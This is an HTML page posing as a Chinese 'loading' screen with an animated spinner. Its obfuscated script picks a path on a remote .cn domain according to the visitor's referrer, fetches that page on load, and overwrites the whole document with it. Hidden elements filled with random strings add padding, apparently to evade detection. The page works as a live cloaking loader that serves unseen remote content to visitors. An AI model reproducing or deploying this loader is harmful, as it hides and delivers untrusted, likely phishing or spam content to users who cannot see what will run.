<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sBrIRWO6S3G {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sBrIRWO6S3G .t0G2Lxx {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sBrIRWO6S3G .content {
            line-height: 50px;
            text-align: center
        }

        .sBrIRWO6S3G .img {
            width: 100%
        }

        .sBrIRWO6S3G .hnqQfI1g {
            text-align: center
        }

        .sBrIRWO6S3G .hnqQfI1g span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sBrIRWO6S3G .hnqQfI1g span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sBrIRWO6S3G .hnqQfI1g span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sBrIRWO6S3G .hnqQfI1g span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sBrIRWO6S3G .hnqQfI1g span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sBrIRWO6S3G .hnqQfI1g span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sBrIRWO6S3G .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function xYpcr8L9g4BJ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var FBf2n = xYpcr8L9g4BJ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ FBf2n +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ FBf2n +".html?a=share";
		}
		
        jHyElZCjD=url+"#"+new Date().getTime();
        jHyElZCjD && function() {
            $.get(jHyElZCjD, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>E6QgzRbjMDIb9TxCoP5VLEvzC46RZMGx10YJrlE</p>
<img  src='' style='display:none'>
<p  style='display:none'>E6QgzRbjMDIb9TxCoP5VLEvzC46RZMGx10YJrlE</p><div class="sBrIRWO6S3G">
    <div class="t0G2Lxx">
        <div class="hnqQfI1g">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >nfhsf0dgvFHKheXHY7i7zXw0NF5VGViVPP7UQcq7EjR2BqmDIQtv3A8n7U4FKGvq8fji8gFxgDtw6BDitHbW3DfYdBj2</b>
<a  href='#' style='display:none'>TlOz61NDi1FZeZLoxZPpNzJkMzJzvBzyRnM0v6iYoi2VWLgvJIX7q8qVCW9</a>
<p  style='display:none'>ctpV003twrACoJinPZLpMBS7nOXT1uzQAa3j3hWftKBOWK6ThZ8C8tFhQm0nA1EdKL5GJslD6XwOCNqXECfcfagBePyWsZYCSYY</p>
<h1 style='display:none' >NUMbFJdyo0ED8W</h1>
<div style='display:none'>B9R5ZvgrvZa4q4xQpl8umS7GBf45iepObWNwPucOa1Ddj0jea9bmJsFL0OAtulEozShE5FuOFxvT8Y6</div>
<img  src='' style='display:none'>
<p  style='display:none'>ctpV003twrACoJinPZLpMBS7nOXT1uzQAa3j3hWftKBOWK6ThZ8C8tFhQm0nA1EdKL5GJslD6XwOCNqXECfcfagBePyWsZYCSYY</p>
<img  src='' style='display:none'></body>
</html>